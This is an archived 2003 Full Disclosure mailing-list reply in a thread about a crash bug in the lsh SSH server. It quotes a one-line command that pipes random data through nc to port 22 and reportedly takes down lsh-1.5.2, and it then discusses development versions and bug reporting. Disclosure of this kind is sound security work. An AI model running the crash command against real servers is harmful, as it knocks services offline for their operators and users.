Full Disclosure mailing list archives
Re: new ssh exploit?
From: Damian Gerow <damian () sentex net>
Date: Thu, 18 Sep 2003 12:06:15 -0400
Thus spake Bennett Todd (bet () rahul net) [18/09/03 11:49]:
This command: dd if=/dev/urandom bs=1024 count=1|nc <hostname> 22 >/dev/null takes down an lsh-1.5.2 reliably taking no more than 2-3 tries on average.
Did you try on a 1.4 release? 1.5 is development, I'd expect it to be a little buggy. (Not that I'm defending lsh, I've just taken my first look at it yesterday, and I don't know much about it at all. Just trying to be fair.)
I tried emailing this to lsh-bugs, got some moronic thing from some idiot third-party anti-spam service "please send this special email to this special place and we might think about letting your message through". Right.
Did you sign up to the mailing list first? At least they let non-subscribers post to their list -- most lists are closed these days, including this one. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re: new ssh exploit?, (continued)
- Re: new ssh exploit? Jonathan A. Zdziarski (Sep 16)
- Re: new ssh exploit? Valdis . Kletnieks (Sep 17)
- Re: new ssh exploit? Valdis . Kletnieks (Sep 17)
- Re: new ssh exploit? Ron DuFresne (Sep 16)
- Re: new ssh exploit? Bennett Todd (Sep 16)
- Re: new ssh exploit? Ron DuFresne (Sep 16)
- Re: new ssh exploit? Bennett Todd (Sep 16)
- Re: new ssh exploit? Blue Boar (Sep 16)
- Re: new ssh exploit? Bennett Todd (Sep 17)
- Re: new ssh exploit? Bennett Todd (Sep 18)
- Re: new ssh exploit? Damian Gerow (Sep 18)
- Re: new ssh exploit? Bennett Todd (Sep 18)
- Re: new ssh exploit? Damian Gerow (Sep 18)
- Re: new ssh exploit? Perry E. Metzger (Sep 18)
- Re: new ssh exploit? KF (Sep 18)
- Re: new ssh exploit? KF (Sep 18)
- lsh patch (was Re: new ssh exploit?) Bennett Todd (Sep 19)
- Re: lsh patch (was Re: new ssh exploit?) Carl Livitt (Sep 19)
- Re: lsh patch (was Re: new ssh exploit?) Niels Möller (Sep 19)
- Re: new ssh exploit? Shanphen Dawa (Sep 16)